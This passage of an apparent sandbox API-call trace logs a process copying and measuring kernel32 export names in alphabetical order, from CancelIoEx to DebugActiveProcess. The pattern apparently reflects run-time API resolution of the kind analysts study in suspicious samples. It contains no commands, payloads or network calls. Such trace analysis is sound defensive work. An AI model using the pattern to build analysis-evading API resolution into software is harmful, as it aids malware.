returned="CancelIoEx" [0182.382] lstrlenA (lpString="CANCELIOEX") returned 10 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0182.382] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0182.382] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0182.382] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0182.382] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0182.382] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0182.382] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0182.382] lstrlenA (lpString="CHECKELEVATION") returned 14 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0182.383] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0182.383] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0182.383] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0182.383] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0182.383] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0182.383] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0182.383] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0182.383] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0182.383] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0182.383] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0182.383] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0182.383] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0182.383] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0182.383] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0182.383] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0182.383] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0182.383] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0182.383] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0182.384] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0182.384] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0182.384] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0182.384] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0182.384] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0182.384] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0182.384] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0182.384] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0182.384] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0182.384] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0182.384] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0182.384] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0182.384] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0182.384] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0182.384] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0182.384] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0182.384] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0182.384] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0182.384] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0182.385] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0182.385] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0182.385] lstrlenA (lpString="COPYCONTEXT") returned 11 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0182.385] lstrlenA (lpString="COPYFILEA") returned 9 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0182.385] lstrlenA (lpString="COPYFILEEXA") returned 11 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0182.385] lstrlenA (lpString="COPYFILEEXW") returned 11 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0182.385] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0182.385] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0182.385] lstrlenA (lpString="COPYFILEW") returned 9 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0182.385] lstrlenA (lpString="COPYLZFILE") returned 10 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0182.385] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0182.385] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0182.385] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0182.385] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0182.385] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0182.385] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0182.385] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0182.385] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0182.385] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0182.386] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0182.386] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0182.386] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0182.386] lstrlenA (lpString="CREATEEVENTA") returned 12 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0182.386] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0182.386] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0182.386] lstrlenA (lpString="CREATEEVENTW") returned 12 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0182.386] lstrlenA (lpString="CREATEFIBER") returned 11 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0182.386] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0182.386] lstrlenA (lpString="CREATEFILEA") returned 11 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0182.386] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0182.386] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0182.386] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0182.386] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0182.386] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0182.386] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0182.386] lstrlenA (lpString="CREATEFILEW") returned 11 [0182.386] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0182.386] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0182.387] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0182.387] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0182.387] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0182.387] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0182.387] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0182.387] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0182.387] lstrlenA (lpString="CREATEJOBSET") returned 12 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0182.387] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0182.387] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0182.387] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0182.387] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0182.387] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0182.387] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0182.387] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0182.387] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0182.387] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0182.387] lstrlenA (lpString="CREATEPIPE") returned 10 [0182.387] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0182.388] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0182.388] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0182.388] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0182.388] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0182.388] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0182.388] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0182.388] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0182.388] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0182.388] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0182.388] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0182.388] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0182.388] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0182.388] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0182.388] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0182.388] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0182.388] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0182.388] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0182.388] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0182.388] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0182.389] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0182.389] lstrlenA (lpString="CREATETHREAD") returned 12 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0182.389] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0182.389] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0182.389] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0182.389] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0182.389] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0182.389] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0182.389] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0182.389] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0182.389] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0182.389] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0182.389] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0182.389] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0182.389] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0182.389] lstrlenA (lpString="CTRLROUTINE") returned 11 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0182.389] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0182.389] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0182.390] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0182.390] lstrcpyA (in: lpString1=0x36fce30, 